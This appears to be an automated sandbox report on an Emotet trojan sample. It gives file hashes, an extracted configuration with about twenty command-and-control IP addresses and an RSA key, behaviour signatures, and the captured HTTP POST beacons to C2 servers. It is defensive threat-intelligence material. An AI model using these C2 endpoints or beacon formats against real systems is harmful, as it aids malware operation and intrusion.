Analysis

  • max time kernel
    137s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    17-07-2020 22:55

General

  • Target

    60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe

  • Size

    273KB

  • MD5

    06e644beed2742ff076b8dc4a3f71fd1

  • SHA1

    135d1f978d305d68169ea2d17a80e28ba0524e98

  • SHA256

    60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414

  • SHA512

    4db22553db043706acfa2a364d9fb768f4d0912967c7ffbc51816ca071672adeecee84208edc51d61782bd9f02066c2eb2bc810ad5236668922064e1b54f2257

Score
10/10

Malware Config

Extracted

Family

emotet

C2

177.144.130.105:443

198.27.69.201:8080

157.7.164.178:8081

78.188.170.128:80

203.153.216.178:7080

77.74.78.80:443

178.33.167.120:8080

177.0.241.28:80

143.95.101.72:8080

51.38.201.19:7080

181.167.35.84:80

41.185.29.128:8080

192.163.221.191:8080

181.164.110.7:80

203.153.216.182:7080

80.211.32.88:8080

113.160.180.109:80

185.142.236.163:443

192.241.220.183:8080

87.106.231.60:8080

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ
3
cMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j
4
l32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB
5
-----END PUBLIC KEY-----
6

Signatures

  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Users\Admin\AppData\Local\Temp\60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe
    "C:\Users\Admin\AppData\Local\Temp\60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: EmotetMutantsSpam
    PID:652

Network

  • flag-unknown
    POST
    http://177.144.130.105:443/fRWcfj2CBG0/GX52zywQDP0skHvRf/
    60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe
    Remote address:
    177.144.130.105:443
    Request
    POST /fRWcfj2CBG0/GX52zywQDP0skHvRf/ HTTP/1.1
    Referer: http://177.144.130.105/fRWcfj2CBG0/GX52zywQDP0skHvRf/
    Content-Type: multipart/form-data; boundary=---------------------------756975529789429
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 177.144.130.105:443
    Content-Length: 4500
    Connection: Keep-Alive
    Cache-Control: no-cache
  • flag-unknown
    POST
    http://198.27.69.201:8080/kd1b/RD0y8MG/CvF2l9S/42phKkNAQ4t/HsuzPNyZ/
    60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe
    Remote address:
    198.27.69.201:8080
    Request
    POST /kd1b/RD0y8MG/CvF2l9S/42phKkNAQ4t/HsuzPNyZ/ HTTP/1.1
    Referer: http://198.27.69.201/kd1b/RD0y8MG/CvF2l9S/42phKkNAQ4t/HsuzPNyZ/
    Content-Type: multipart/form-data; boundary=---------------------------198771306462490
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 198.27.69.201:8080
    Content-Length: 4500
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 17 Jul 2020 22:56:38 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 127.0.0.1:47001
  • 177.144.130.105:443
    http://177.144.130.105:443/fRWcfj2CBG0/GX52zywQDP0skHvRf/
    http
    60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe
    6.8kB
    432 B
    10
    9

    HTTP Request

    POST http://177.144.130.105:443/fRWcfj2CBG0/GX52zywQDP0skHvRf/
  • 198.27.69.201:8080
    http://198.27.69.201:8080/kd1b/RD0y8MG/CvF2l9S/42phKkNAQ4t/HsuzPNyZ/
    http
    60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe
    5.7kB
    580 B
    16
    7

    HTTP Request

    POST http://198.27.69.201:8080/kd1b/RD0y8MG/CvF2l9S/42phKkNAQ4t/HsuzPNyZ/

    HTTP Response

    200
  • 239.255.255.250:1900
    1.3kB
    8
  • 239.255.255.250:1900
  • 10.10.0.255:137
    netbios-ns
    288 B
    3
  • 10.10.0.24:137
    netbios-ns
    270 B
    3

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/652-0-0x0000000000630000-0x000000000063C000-memory.dmp

    Filesize

    48KB

  • memory/652-1-0x0000000000400000-0x0000000000449000-memory.dmp

    Filesize

    292KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.